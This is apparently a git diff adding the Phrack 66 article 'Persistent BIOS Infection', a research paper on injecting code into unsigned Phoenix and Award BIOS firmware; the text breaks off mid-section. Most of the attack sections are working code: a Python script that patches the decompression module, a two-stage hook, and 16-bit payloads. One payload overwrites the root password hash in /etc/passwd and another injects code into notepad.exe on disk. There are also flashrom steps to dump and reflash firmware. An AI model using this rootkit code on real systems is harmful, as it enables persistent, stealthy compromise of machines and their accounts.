+M-S?E4&2J'"<F9&7'H]T66GOMQ?&(SC)/PC06/;FC@'Y?<#@)X^3J733"[:7'
+MQ]/H<>#I?)7G36B/QWCI"NE`RFXL_33`.S'(TZ65%2/]8<Z03W]R'"\P,G;0
+M1L&5<A^JT%KNUA5=EP4-@;K&N&_66X3[9L,J69;"/:ENA5ZO/_%&L>?W^+XA
+M4?#E;4R83VY:;=,Q#32>]L[_5A(F,DI@I_-K4I7G;0$"Y//H+HKE50_(BK6*
+MB5/C-R;2O$U?[9QSB:J\+=.D3;N;D3CMQRR9=5!"I'5+8FK4,PD\)1Y!FQ&=
+ML]W@VP+VTGMBL;PZ].'C3!@5T<WRZ#+`TR$A$#Q.O3H?%55V3:;*[E.=*FRZ
+M3[[W'1P8J(9!&$N7[;U1P;[.!*=Y6%R&PQD,3@,O$B;9?^N\Q[M;MY/>#&[0
+MS@NIY>?L&:5GC&^0#KEZ6O\]E]U?']-;/^MG_:R?];-^UL_Z63_K9_VLG_6S
+7?M;/^ED_ZV?]K)_/]OP_+L#]0P"@````
+`
+end
+
+--------[ EOF
diff --git a/phrack66/7.txt b/phrack66/7.txt
new file mode 100644
index 0000000..d0df7d6
--- /dev/null
+++ b/phrack66/7.txt
@@ -0,0 +1,1641 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x07 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=--------------------=[  Persistent BIOS Infection   ]=-----------------=|
+|=-----------------=[ "The early bird catches the worm" ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[  .aLS - anibal.sacco@coresecurity.com  ]=------------=|
+|=---------------=[   Alfredo - alfredo@coresecurity.com   ]=------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ June 1 2009 ]=---------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+------[  Index
+
+  0 - Foreword
+
+  1 - Introduction
+    1.1 - Paper structure
+
+  2 - BIOS basics
+    2.1 - BIOS introduction
+        2.1.1 - Hardware
+        2.1.2 - How it works? 
+    2.2 - Firmware file structure
+    2.3 - Update/Flashing process
+    
+
+  3 - BIOS Infection
+	3.0 - Initial setup
+	3.1 - VMWare's (Phoenix) BIOS modification
+        3.1.1 - Dumping the VMWare BIOS
+        3.1.2 - Setting up VMWARE to load an alternate BIOS
+        3.1.3 - Unpacking the firmware
+		3.1.4 - Modification
+		3.1.5 - Payload
+			3.1.5.1 - The Ready Signal
+		3.1.6 - OptionROM
+
+    3.2 - Real (Award) BIOS modification
+		3.2.1 - Dumping the real BIOS firmware
+		3.2.2 - Modification
+        3.2.3 - Payload
+
+  4 - BIOS32 (Direct kernel infection)
+		
+  5 - Future and other uses
+  	5.1 - SMM!
+
+  6 - Greetz
+
+  7 - References
+
+  8 - Sources - Implementation details
+
+  
+------[ 0.- Foreword
+  
+Dear reader, if you're here we can assume that you already know what 
+the BIOS is and how it works. Or, at least, you have a general 
+picture of what the BIOS does, and its importance for the normal 
+operation of a computer. Based on that, we will briefly explain some 
+basic concepts to get you into context and then we'll jump to the, 
+more relevant, technical stuff.
+  
+------[ 1.- Introduction
+    
+Over the years, a lot has been said about this topic. But, apart of 
+the old Chernobyl virus, which just zeroed the BIOS if you 
+motherboard was one of the supported, or some modifications with 
+modding purposes (that were a very valuable source of data, btw) 
+like Pinczakko's work, we wouldnt be able to find any public 
+implementation of a working, generical and malicious BIOS infection.
+    
+Mostly, the people tends to think that this is a very researched, 
+old and already mitigated technique. It is sometimes even confused 
+whith the obsolet MBR viruses. But, is our intention to show that 
+this kind of attacks are possible and could be, with the aproppiated 
+OS detection and infection techniques, a very trustable and persistent
+rootkit residing just inside of the BIOS Firmware.
+    
+In this paper we will show a generic method to inject code into 
+unsigned BIOS firmwares. This technique will let us embedd our own 
+code into the BIOS firmware so that it will get executed just before
+the loading of the operating system. 
+    
+We will also demonstrate how having complete control of the hard 
+drives allows us to leverage true persistency by deploying fully 
+functional code directly into a windows process or just by modifying 
+sensitive OS data in a Linux box. 
+   
+---[ 1.1 - Paper structure
+  
+The main idea of this paper is to show how the BIOS firmware can be
+modified and used as a persistence method after a successful 
+intrusion.
+		
+So, we will start by doing a little introduction and then we will 
+focus the paper on the proof of concept code, splitting the paper 
+in two main sections:
+		
+  - VMWare's (Phoenix) BIOS modification
+		
+  - Real (Award) BIOS modification
+		
+In each one we will explain the payloads to show how the attack is 
+done, and then we'll jump directly to see the payload code.
+
+		
+------[ 2.- BIOS Basics
+  
+---[2.1 - BIOS introduction
+  
+From Wikipedia [1]:
+    "The BIOS is boot firmware, designed to be the first code run by a 
+    PC when powered on. The initial function of the BIOS is to identify
+    test, and initialize system devices such as the video display card,
+    hard disk, and floppy disk and other hardware. This is to prepare 
+    the machine into a known state, so that software stored on 
+    compatible media can be loaded, executed, and given control of the 
+    PC.[3] This process is known as booting, or booting up, which is 
+    short for bootstrapping."
+
+    "...provide a small library of basic input/output functions that 
+    can be called to operate and control the peripherals such as the 
+    keyboard, text display functions and so forth. In the IBM PC and 
+    AT, certain peripheral cards such as hard-drive controllers and 
+    video display adapters carried their own BIOS extension ROM, which
+    provided additional functionality. Operating systems and executive
+    software, designed to supersede this basic firmware functionality,
+    will provide replacement software interfaces to applications.
+        
+---[2.1.1 - Hardware     
+        
+Back in the 80's the BIOS firmware was contained in ROM or PROM 
+chips, which could not be altered in any way, but nowadays, this 
+firmware is stored in an EEPROM (Electrically Erasable 
+Programmable Read-Only Memory). This kind of memory allows the user
+to reflash it, allowing the vendor to offer firmware updates in 
+order to fix bugs, support new hardware and to add new 
+functionality.
+        
+  
+---[2.1.2 - How it works?
+  
+The BIOS has a very important role in the functioning of a 
+computer.
+It should be always available as it holds the first instruction
+executed by the CPU when it is turned on. This is why it is stored
+in a ROM.
+        
+The first module of the BIOS is called Bootblock, and it's in 
+charge of the POST (Power-on self-test) and Emergency boot 
+procedures. POST is the common term for a computer, router or 
+printer's pre-boot sequence. It has to test and initialize almost 
+all the different hardware components in the system to make sure 
+everything is working properly.
+        
+The modern BIOS has a modular structure, which means that there are
+several modules integrated on the same firmware, each one in charge
+of a different specific task; from hardware initialization to 
+security measures.
+        
+Each module is compressed, therefore there is a decompression 
+routine in charge of the decompression and validation of the 
+others modules that will be subsequently executed.  
+
+After decompression, some other hardware is initialized, such as 
+PCI Roms (if needed) and at the end, it reads the sector 0 of the
+hard drive (MBR) looking for a boot loader to start loading the 
+Operating System.
+        
+        
+---[2.2 - Firmware file structure
+        
+As we said before, the BIOS firmware has a modular structure. When 
+stored in a normal plain file, it is composed of several LZH
+compressed modules, each of them containing an 8 bit checksum.
+        
+However, not all the modules are compressed, a few modules like the
+Bootblock and the Decompression routine are obviously uncompressed 
+because they are a fundamental piece of the booting process and 
+must perform the decompression of the other modules. Further, 
+we will see why this is so convenient for our purposes.
+        
+Here we have the output of Phnxdeco (available in the Debian 
+repositories), an open source tool to parse and analyze the Phoenix
+BIOS Firmware ROMs (that we'll going to extract at 3.1.1):
+
+
++-------------------------------------------------------------------------+
+| Class.Instance (Name)     Packed --->  Expanded      Compression  Offse |
++-------------------------------------------------------------------------+
+
+B.03 (    BIOSCODE)   06DAF (28079) => 093F0 ( 37872)  LZINT ( 74%)  446DFh
+B.02 (    BIOSCODE)   05B87 (23431) => 087A4 ( 34724)  LZINT ( 67%)  4B4A9h
+B.01 (    BIOSCODE)   05A36 (23094) => 080E0 ( 32992)  LZINT ( 69%)  5104Bh
+C.00 (      UPDATE)   03010 (12304) => 03010 ( 12304)   NONE (100%)  5CFDFh
+X.01 (     ROMEXEC)   01110 (04368) => 01110 (  4368)   NONE (100%)  6000Ah
+T.00 (    TEMPLATE)   02476 (09334) => 055E0 ( 21984)  LZINT ( 42%)  63D78h
+S.00 (     STRINGS)   020AC (08364) => 047EA ( 18410)  LZINT ( 45%)  66209h
+E.00 (       SETUP)   03AE6 (15078) => 09058 ( 36952)  LZINT ( 40%)  682D0h
+M.00 (       MISER)   03095 (12437) => 046D0 ( 18128)  LZINT ( 68%)  6BDD1h
+L.01 (        LOGO)   01A23 (06691) => 246B2 (149170)  LZINT (  4%)  6EE81h
+L.00 (        LOGO)   00500 (01280) => 03752 ( 14162)  LZINT (  9%)  708BFh
+X.00 (     ROMEXEC)   06A6C (27244) => 06A6C ( 27244)   NONE (100%)  70DDAh
+B.00 (    BIOSCODE)   001DD (00477) => 0D740 ( 55104)  LZINT (  0%)  77862h
+*.00 (      TCPA_*)   00004 (00004) => 00004 (   004)   NONE (100%)  77A5Ah
+D.00 (     DISPLAY)   00AF1 (02801) => 00FE0 (  4064)  LZINT ( 68%)  77A79h
+G.00 (  DECOMPCODE)   006D6 (01750) => 006D6 (  1750)   NONE (100%)  78585h
+A.01 (        ACPI)   0005B (00091) => 00074 (   116)  LZINT ( 78%)  78C76h
+A.00 (        ACPI)   012FE (04862) => 0437C ( 17276)  LZINT ( 28%)  78CECh
+B.00 (    BIOSCODE)   00BD0 (03024) => 00BD0 (  3024)   NONE (100%)  7D6AAh
+
+
+We can see here the different parts of the Firmware file, 
+containing the DECOMPCODE section, where the decompression routine
+is located, as well as the other not-covered-in-this-paper 
+sections.
+        
+---[2.3 - Update/Flashing process
+    
+The BIOS software is not so different from any other software.
+It's prone to bugs in the same way as other software is. 
+Newer versions come out adding support for new hardware, features 
+and fixing bugs, etc. But the flashing process could be very 
+dangerous on a real machine. The BIOS is a fundamental component 
+of the computer. It's the first piece of code executed when a 
+machine is turned on. This is why we have to be very carefully when
+doing this kind of things. A failed BIOS update can -and probably
+will- leave the machine unresponsive. And that just sucks.
+	
+That is why it's so important to have some testing platform, such 
+as VMWare, at least for a first approach, because, as we'll see,
+there are a lot of differences between the vmware version vs. the
+real hardware version.
+
+------[ 3.- BIOS Infection
+
+---[3.0 - Initial setup
+
+---[3.1 - VMWare's (Phoenix) BIOS modification
+
+First, we have to obtain a valid VMWARE BIOS firmware to work on. 
+        
+In order to read the EEPROM where the BIOS firmware is stored we 
+need to run some code in kernel mode to let us send and receive 
+data directly to the southbridge through the IO Ports. To do this,
+we also need to know some specific data about the current hardware.
+This data is usually provided by the vendor. Furthermore, almost 
+all motherboard vendors provide some tool to update the BIOS, and 
+very often, they have an option to backup or dump the actual 
+firmware.
+
+In VMWare we can't use this kind of tools, because the emulated 
+hardware doesn't have the same functionality as the real hardware.
+This makes sense... why would someone would like to update the
+VMWare BIOS from inside...?
+  
+---[3.1.1 - Dumping the VMWare BIOS
+        
+When we started this, it was really helpful to have the embedded 
+gdb server that VMWare offers. This let us debug and understand 
+what was happening. 
+So in order to patch and modify some little pieces of code to start
+testing, we used some random byte arrays as patterns to find the
+BIOS in memory. 
+Doing this we found that there is a little section of almost 256kb
+in vmware-vmx, the main vmware executable, called .bios440 
+( that in our vmware version is located between the file offset
+0x6276c7-0x65B994 ) that contains the whole BIOS firmware, in the 
+same way as it is contained in a normal file ready to flash.
+	
+You can use objdump to see the sections of the file: 
+		
+objdump -h vmware-vmx
+        
+And you can dump it to a file using the objcopy tool:
+		
+objcopy -j .bios440 -O binary --set-section-flags .bios440=a \ 
+vmware-vmx bios440.rom.zl
+		
+Umm... this means that... if we have root privileges in the victim
+machine, we could use our amazing power to modify the vmware-vmx 
+executable, inserting our own infected bios and it will be 
+executed each time a vmware starts, for every vmware of the 
+computer. Sweet!
+        
+But, there are simpler ways to accomplish this task. We are going 
+to modify it a lot of times and it is not going to work most of 
+the times so.. the simpler, the better.
+
+---[3.1.2 - Setting up VMWARE to load an alternate BIOS
+
+We found that VMWare offers a very practical way to let the user 
+provide an specific BIOS firmware file directly through the .VMX 
+configuration file.
+        
+This not-so-known tag is called "bios440.filename" and it let us 
+avoid using VMWare's built-in BIOS and instead allows us to 
+specify a BIOS file to use.
+        
+You have to add this line in your .VMX file:
+        
+	bios440.filename = "path/to/file/bios.rom"
+        
+And, voila!, now you have another BIOS firmware running in your VM,
+and in 	combination with:
+				
+	debugStub.listen.guest32 = "TRUE" or
+	debugStub.listen.guest64 = "TRUE" 
+		
+that will leave the VMWare's gdb stub waiting for your connection 
+on localhost on port 8832. You will end up with an excellent -and 
+completely debuggable- research scenery.  Nice huh?
+
+Other important hidden tags that can be useful to define are:
+		
+        bios.bootDelay = "3000"                  # To delay the boot X 
+                                                   miliseconds
+        debugStub.hideBreakpoints = "TRUE"       # Allows gdb breakpoints 
+                                                   to work
+        debugStub.listen.guest32.remote = "TRUE" # For debugging from 
+                                                   another machine (32bit)
+        debugStub.listen.guest64.remote = "TRUE" # For debugging from 
+                                                   another machine (64bit)
+        monitor.debugOnStartGuest32 = "TRUE"     # This will halt the VM 
+                                                   at the very first 
+                                                   instruction at 0xFFFF0
+        
+---[3.1.3 - Unpacking the firmware
+
+As we mentioned before, some of the modules are compressed
+with an LZH variation. There are a few available tools to
+extract and decompress each individual module from the
+Firmware file. The most used are Phnxdeco and Awardeco (two
+excellent linux GPL tools) together with Phoenix BIOS Editor
+and Award BIOS editor (some non GPL tools for windows).
+        
+You can use Phoenix BIOS editor over linux using wine if you
+want.  It will extract all the modules in a /temp directory
+inside the Phoenix BIOS editor ready to be open with your
+preferred disassembler.
+		
+The great news about Phoenix BIOS Editor is that it can also
+rebuild the main firmware file. It can recompress and 
+integrate all the different decompressed modules to let it 
+just as it was at the beggining.
+The only thing is that it was done for older Phoenix BIOSes, 
+and it misses the checksum so we will have to do it by 
+ourselves as we'll see at 3.2.2.1
+
+Some of these tasks are done by isolated tools that can be
+invoked directly from a command line, which is very practical
+in order to automate the process with simple scripts.
+		        
+
+---[3.1.4 - Modification
+
+So, here we are. We have all the modules unpacked, and the
+possibility of modifying them, and then rebuild them in a
+fully working BIOS flash update.
+		
+The first thing to deal with now is 'where to patch'. We can
+place a hook in almost any place to get our code executed but
+we have to think things through before deciding on where to
+patch.
+		
+At the beginning we thought about hooking the first
+instruction executed by the CPU, a jump at 0xF000:FFF0. It
+seemed to be the best option because it is always in the same
+place, and is easy to find but we have to take into
+consideration the execution context. To have our code running
+there should imply doing all the hardware initialization by
+ourselves (DRAM, Northbridge, Cache, PCI, etc.) 
+		
+For example, if we want to do things like accessing the hard
+drive we need to be sure that when our code gets executed it
+already has access to the hard drive. 
+		
+For this reason, and because it doesn't change between
+different versions, we've chosen to hook the decompression
+routine. It is also very easy to find by looking for a
+pattern. It is uncompressed, and is called many times during
+the BIOS boot sequence letting us check if all the needed
+services are available before doing the real stuff.
+
+Here we have a dump script to quickly extract the firmware
+modules, assemble the payloads, inject it, and reassemble the
+modified firmware file.
+		
+PREPARE.EXE and CATENATE.EXE are propietary tools to build
+phoenix firmware that you can find inside the Phoenix BIOS
+Editor and packaged with other flashing tools.
+        
+In later versions of this script this tools arent needed anymore. (as
+seen at 3.2.2.1)
+        
+#!/usr/bin/python import os,struct
+
+#--------------------------- Decomp processing ------------------------------
+#assemble the whole code to inject
+os.system('nasm ./decomphook.asm')
+decomphook = open('decomphook','rb').read()
+print "Leido hook: %d bytes" % len(decomphook)
+minihook = '\x9a\x40\x04\x3b\x66\x90' # call near +0x430
+
+#Load the decompression rom
+decorom = open('DECOMPC0.ROM.orig','rb').read()
+
+#Add the hook
+hookoffset=0x23
+decorom = decorom[:hookoffset]+minihook+decorom[len(minihook)+hookoffset:]
+
+#Add the shellcode
+decorom+="\x90"*100+decomphook
+decorom=decorom+'\x90'*10
+
+#recalculate the ROM size
+decorom=decorom[:0xf]+struct.pack("<H",len(decorom)-0x1A)+decorom[0x11:]
+
+#Save the patched decompression rom
+out=open('DECOMPC0.ROM','wb')
+out.write(decorom)
+out.close()
+
+#Compile 
+print "Prepare..."
+os.system('./PREPARE.EXE ./ROM.SCR.ORIG')
+print "Catenate..."
+os.system('./CATENATE.EXE ./ROM.SCR.ORIG')
+os.system('rm *.MOD')
+		
+---[3.1.5 - Payload
+
+Before talking about the payload, we have to resolve *where*
+are we going to store our payload, and this is not a trivial
+task. We found that there is a lot of padding space at the end
+of the decompression routine that, when allocated, will be
+used as a buffer to hold the decompressed code. Trashing in
+this way, any code that we can store there. This adds a bit of
+complexity to the payload, because it makes us split the
+shellcode in two stages.
+
+The first one gets executed by setting a very typical hook in
+the prolog of the decompression routine. A simple relative
+call that redirects the execution flow to our code and moves
+the second stage to a safe hardcoded place that we know
+remains unused during the whole boot process. Then, updates
+the hook making it point to the new address and executes the
+instructions smashed by the original call
+		
+                __________________________________
+                |                                  |
+                |              HOOK                +->---.
+                |..................................|     |
+           .--->|                                  |     |
+           |    |                                  |     |
+           |    |       DECOMPRESSION BLOCK        |     |
+           |    |                                  |     |
+           |    |                                  |     |
+           |    |__________________________________|     |
+           |    |                                  |<----'
+           |    |       First Stage Payload        |
+           |    |       (Moves second stage        |
+           |    |         to a safe place          |
+           |    |       and updates the hook)      |
+           |    |                                  |
+           |    |..................................|
+           `--<-+       Code smashed by hook       |
+                |__________________________________|
+                |                                  |
+                |       Second Stage Payload       |
+                |                                  |
+                |                                  |
+                |__________________________________|
+        
+Lets see the code:
+        
+	|-----------------------------------------------------------|
+
+BITS 16
+
+;Extent to search (in 64K sectors, aprox 32 MB)
+%define EXTENT 10 
+
+start_mover:
+
+   ;save regs
+   ;jmp start_mover
+    pusha
+    pushf
+
+   ; set dst params to move the shellcode
+    xor ax, ax
+    xor di, di
+    xor si, si
+    push cs
+    pop ds
+    mov es, ax ; seg_dst
+    mov di, 0x8000 ; off_dst
+    mov cx, 0xff ; code_size
+
+   ; get_eip to have the 'source' address
+    call b
+b:
+    pop si
+    add si, 0x25  (Offset needed to reach the second stage payload)
+    rep movsw
+
+    mov ax, word [esp+0x12] ; get the caller address to patch the original hook
+    sub ax, 4
+    mov word [eax], 0x8000 ; new_hook offset
+    mov word [eax+2], 0x0000 ; new_hook segment
+
+    ; restore saved regs
+    popf
+    popa
+
+    ; execute code smashed by 'call far'
+    ;mov es,ax
+    mov bx,es
+    mov fs,bx
+    mov ds,ax
+    retf
+		
+		
+    ;Here goes a large nopsled and next, the second stage payload
+		
+	|------------------------------------------------------------|
+
+The second stage, now residing in an unused space, has got to
+have some ready signal to know if the services that we want to
+use are available..
+		
+---[3.1.5.1 - The Ready Signal
+
+
+In the VMWare we've seen that when our second-stage payload is called,
+and the IVT is already initialized, we have all we need to do our
+stuff.  Based on that we chose to use the IVT initialization as our
+ready signal.  This is very simple because it's always mapped at
+0000:0000. Every time the shellcode gets executed first checks if the
+IVT is initialized with valid pointers, if it is the shellcode is
+executed, if not it returns without doing anything.
+
+        
+---[3.1.5.1 - The Real stuff
+  
+Now we have our code executed and we know that we have all the
+services we need so what are we going to do? We can't interact with
+the OS from here. 
+        
+In this moment the operating system is just a char array sitting on
+the disk. But hey! wait, we have access to the disk through the int
+13h (Low Level Disk Services).. we can modify it in any way we want!.
+Ok, let's do it.
+        
+In a real malicious implementation, you would like to code some sort
+of basic driver to correctly parse the different filesystem
+structures, at least for FAT & NTFS (maybe reusing GRUB or LILO code?)
+but for this paper, just as Proof of Concept, we will use the Int 13h
+to sequentially read the disk in raw mode.  We will look for a pattern
+in a very stupid way and it will work, but doing what we said before,
+in a common scenery, will be possible to modify, add and delete any
+desired file of the disk allowing an attacker to drop driver modules,
+infect files, disable the antivirus or anti rootkits, etc.
+
+This is the shellcode that we've used to walk over the whole
+disk matching the pattern: "root:$" in order to find the root
+entry of the /etc/passwd file.
+
+Then, we replace the root hash with our own hash, setting the
+password "root" for the root user.
+
+-------------------------------------------------------------
+; The shellcode doesn't have any type of optimization, we tried to keep it 
+; simple, 'for educational purposes' 
+
+; 16 bit shellcode
+; use LBA disk access to change root password to 'root'
+
+BITS 16	
+	push es
+	push ds
+	pushad
+	pushf
+
+	; Get code address
+	call gca
+gca:    pop bx
+
+	; construct DAP
+	push cs
+	pop ds
+	mov si,bx
+	add si,0x1e0 ; DAP 0x1e0 from code
+	mov cx,bx
+	add cx,0x200 ; Buffer pointer 0x200 from code
+	mov byte [si],16 ;size of SAP
+	inc si
+	mov byte [si],0  ;reserved
+	inc si
+	mov byte [si],1  ;number of sectors
+	inc si
+	mov byte [si],0  ;unused
+	inc si
+	mov word [si],cx ;buffer segment
+	add si,2
+	mov word [si],ds;buffer offset
+	add si,2
+	mov word [si],0 ; sector number
+	add si,2
+	mov word [si],0 ; sector number
+	add si,2
+	mov word [si],0 ; sector number
+	add si,2
+	mov word [si],0 ; sector number
+
+	mov di,0
+	mov si,0
+mainloop:
+	push di
+	push si
+		        
+	;-------- Inc sector number
+	mov cx,3
+	mov si,bx
+	add si,0x1e8
+loopinc:
+	mov ax,word [si]
+	inc ax
+	mov word [si],ax
+	cmp ax,0
+	jne incend
+	add si,2
+	loop loopinc
+incend:
+	;-------- LBA extended read sector
+	mov ah,0x42 ; call number
+	mov dl,0x80 ; drive number 0x80=first hd
+	mov si,bx
+	add si,0x1e0
+	int 0x13
+	jc mainend
+	nop
+	nop
+	nop
+
+	;-------- Search for 'root'
+	mov di,bx
+	add di,0x200 ; pointer to buffer
+	mov cx,0x200 ; 512 bytes per sector
+searchloop:
+	cmp word [di],'ro'
+	jne notfound
+	cmp word [di+2],'ot'
+	jne notfound
+	cmp word [di+4],':$'
+	jne notfound
+	jmp found ; root found!
+notfound:
+	inc di
+	loop searchloop
+
+endSearch:
+	pop si
+	pop di
+
+	inc di
+	cmp di,0
+	jne mainloop
+	inc si
+	cmp si,3
+	jne mainloop
+
+mainend:
+	popf
+	popad
+	pop ds
+	pop es
+	int 3
+found:
+;replace password with: 
+;root:$2a$08$Grx5rDVeDJ9AXXlXOobffOkLOnFyRjk2N0/4S8Yup33sD43wSHFzi:
+;Yes we could've used rep movsb, but we kinda suck.
+	mov word[di+6],'2a'
+	mov word[di+8],'$0'
+	mov word[di+10],'8$'
+	mov word[di+12],'Gr'
+	mov word[di+14],'rD'
+	mov word[di+16],'Ve'
+	mov word[di+18],'DJ'
+	mov word[di+20],'9A'
+	mov word[di+22],'XX'
+	mov word[di+24],'lX'
+	mov word[di+26],'Oo'
+	mov word[di+28],'bf'
+	mov word[di+30],'fO'
+	mov word[di+32],'kL'
+	mov word[di+34],'On'
+	mov word[di+36],'Fy'
+	mov word[di+38],'Rj'
+	mov word[di+40],'k2'
+	mov word[di+42],'N0'
+	mov word[di+44],'/4'
+	mov word[di+46],'S8'
+	mov word[di+48],'Yu'
+	mov word[di+52],'p3'
+	mov word[di+54],'3s'
+	mov word[di+56],'D4'
+	mov word[di+58],'3w'
+	mov word[di+60],'SH'
+	mov word[di+62],'Fz'
+	mov word[di+64],'i:'
+	;-------- LBA extended write sector
+	mov ah,0x43 ; call number
+	mov al,0 ; no verify 
+	mov dl,0x80 ; drive number 0x80=first hd
+	mov si,bx
+	add si,0x1e0
+	int 0x13
+	jmp mainend
+     
+
+
+This other is basically the same payload, but in this case we walk
+over the whole disk trying to match a pattern inside notepad.exe, and
+then we inject a piece of code with a simple call to MessaBoxA and
+ExitProcess to finish it gracefully. 
+
+
+		hook_start:
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+			nop
+		        ;jmp hook_start
+		        ;mov bx,es
+		        ;mov fs,bx
+		        ;mov ds,ax
+		        ;retf
+
+		        pusha
+		        pushf
+		        xor di,di
+			mov ds,di
+			; check to see if int 19 is initialized
+			cmp byte [0x19*4],0x00 
+			jne ifint
+
+		noint:
+		        ;jmp noint ; loop to debug
+		        popf
+		        popa
+		        ;mov es, ax
+		        mov bx, es
+			mov fs, bx
+			mov ds, ax
+		        retf
+
+
+		ifint:
+		        ;jmp ifint ; loop to debug
+			cmp byte [0x19*4],0x46
+		        je noint
+
+		;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+		initShellcode:
+		    ;jmp initShellcode ; DEBUG
+		    cli
+		    push es
+		    push ds
+		    pushad
+		    pushf
+
+		    ; Get code address
+		    call gca
+
+		gca:
+		    pop bx
+		    ;---------- Set screen mode
+		    mov ax,0x0003
+		    int 0x10
+		    ;---------- construct DAP
+		    push cs
+		    pop ds
+		    mov si,bx
+		    add si,0x2e0 ; DAP 0x2e0 from code
+		    mov cx,bx
+		    add cx,0x300 ; Buffer pointer 0x300 from code
+		    mov byte [si],16 ;size of SAP
+		    inc si
+		    mov byte [si],0  ;reserved
+		    inc si
+		    mov byte [si],1  ;number of sectors
+		    inc si
+		    mov byte [si],0  ;unused
+		    inc si
+		    mov word [si],cx ;buffer segment
+		    add si,2
+		    mov word [si],ds;buffer offset
+		    add si,2
+		    mov word [si],0 ; sector number
+		    add si,2
+		    mov word [si],0 ; sector number
+		    add si,2
+		    mov word [si],0 ; sector number
+		    add si,2
+		    mov word [si],0 ; sector number
+
+		    mov di,0
+		    mov si,0
+
+		    ;-------- Function 41h: Check Extensions
+		    push bx
+		    mov ah,0x41 ; call number
+		    mov bx,0x55aa;
+		    mov dl,0x80 ; drive number 0x80=first hd
+		    int 0x13
+		    pop bx
+		    jc mainend_near
+		    ;-------- Function 00h: Reset Disk System
+		    mov ah, 0x00
+		    int 0x13
+		    jc mainend_near
+		    jmp mainloop
+		mainend_near:
+		    jmp mainend
+		mainloop:
+		    cmp di,0
+		    jne nochar
+		    ;------- progress bar (ABCDE....)
+		    push bx
+		    mov ax,si
+		    mov ah,0x0e
+		    add al,0x41
+		    mov bx,0
+		    int 0x10
+		    pop bx
+		nochar:
+		    push di
+		    push si
+		    ;jmp incend    ;
+		    ;-------- Inc sector number
+		    mov cx,3
+		    mov si,bx      ; bx = curr_pos 
+		    add si,0x2e8   ; +2e8 LBA Buffer
+
+		loopinc:
+		    mov ax,word [si]
+		    inc ax
+		    mov word [si],ax
+		    cmp ax,0
+		    jne incend
+		    add si,2
+		    loop loopinc
+
+		incend:
+		LBA_read:
+		    ;jmp int_test
+		    ;-------- LBA extended read sector
+		    mov ah,0x42 ; call number
+		    mov dl,0x80 ; drive number 0x80=first hd
+		    mov si,bx
+		    add si,0x2e0
+		    int 0x13
+		    jnc int13_no_err
+		    ;-------- Write error character
+		    push bx
+		    mov ax,0x0e45
+		    mov bx,0x0000
+		    int 0x10
+		    pop bx
+		int13_no_err:
+		    ;-------- Search for 'root'
+		    mov di,bx
+		    add di,0x300 ; pointer to buffer
+		    mov cx,0x200 ; 512 bytes per sector
+
+		searchloop:
+		    cmp word [di],0x706a
+		    jne notfound
+		    cmp word [di+2],0x9868
+		    jne notfound
+		;debugme:
+		;    je debugme
+		    cmp word [di+4],0x0018
+		    jne notfound
+		    cmp word [di+6],0xe801  
+		    jne notfound
+		    jmp found ; root found!
+
+
+		notfound:
+		    inc di
+		    loop searchloop
+
+		endSearch:
+		    pop si
+		    pop di
+
+		    inc di
+		    cmp di,0
+		    jne mainloop
+		    inc si
+		    cmp si,EXTENT ;------------ 10x65535 sectors to read
+		    jne mainloop
+		    jmp mainend
+
+		exit_error:  
+		    pop si
+		    pop di
+
+		mainend:
+		    popf
+		    popad
+		    pop ds
+		    pop es
+		    sti
+
+		    popf
+		    popa
+		    mov bx, es
+		    mov fs, bx
+		    mov ds, ax
+		    retf
+
+		writechar:
+		    push bx
+		    mov ah,0x0e
+		    mov bx,0x0000
+		    int 0x10
+		    pop bx
+		    ret
+		found:
+		    mov al,0x46
+		    call writechar
+
+    		;mov word[di], 0xfeeb ; Infinite loop - Debug
+		    mov word[di], 0x00be
+		    mov word[di+2], 0x0100
+		    mov word[di+4], 0xc700
+		    mov word[di+6], 0x5006
+		    mov word[di+8], 0x4e57
+		    mov word[di+10], 0xc744
+		    mov word[di+12], 0x0446
+		    mov word[di+14], 0x2121
+		    mov word[di+16], 0x0100
+		    mov word[di+18], 0x016a
+		    mov word[di+20], 0x006a
+		    mov word[di+22], 0x6a56
+		    mov word[di+24], 0xbe00
+		    mov word[di+26], 0x050b
+		    mov word[di+28], 0x77d8
+		    mov word[di+30], 0xd6ff
+		    mov word[di+32], 0x00be
+		    mov word[di+34], 0x0000 
+		    mov word[di+36], 0x5600
+		    mov word[di+38], 0xa2be
+		    mov word[di+40], 0x81ca
+		    mov word[di+42], 0xff7c
+		    mov word[di+44], 0x90d6
+
+		;-------- LBA extended write sector
+		    mov ah,0x43 ; call number
+		    mov al,0 ; no verify 
+		    mov dl,0x80 ; drive number 0x80=first hd
+		    mov si,bx
+		    add si,0x2e0
+		    int 0x13
+		    jmp notfound; continue searching
+		    nop	
+	 
+---[3.2 - Real (Award) BIOS modification
+
+VMWare turned to be an excellent BIOS research and development
+platform.  But to complete this research, we have to attack a real
+system.  For this modification we used a common motherboard (Asus
+A7V8X-MX), with an Award-Phoenix 6.00 PG BIOS, a very popular version.
+
+---[3.2.1 - Dumping the real BIOS firmware
+
+FLASH chips are fairly compatible, even interchangeable. But they are
+connected to the motherboard in many different ways (PCI, ISA bridge,
+etc.), and that makes reading them in a generic way a non-trivial
+problem.  How can we make a generic rootkit if we can't even find a
+way to reliably read a flash chip?  Of course, a hardware flash reader
+is a solution, but at the time we didn't have one and is not really an
+option if you want to remotely infect a BIOS without physical access.
+
+So we started looking for software-based alternatives.  The first tool
+that we found worked fine, which was the Flashrom utility from the
+coreboot open-source project, see [COREBOOT] (Also available in the
+Debian repositories).  It contains an extensive database of chips and
+read/write methods. We found that it almost always works, even if you
+have to manually specify the IC model, as it's not always
+automatically detected.
+
+        $ flashrom -r mybios.rom
+
+Generally, the command above is all that you need. The bios should be
+in the mybios.rom file.
+
+A trick that we learned is that if it says that it can't detect the
+Chip, you should do a script to try every known chip. We have yet to
+find BIOS that can't be read using this technique. Writing is slightly
+more difficult, as Flashrom needs to correctly identify the IC to
+allow writing to it. This limitation can by bypassed modifying the
+source code but beware that you can fry your motherboard this way.
+
+We also used flashrom as a generic way to upload the modified BIOS
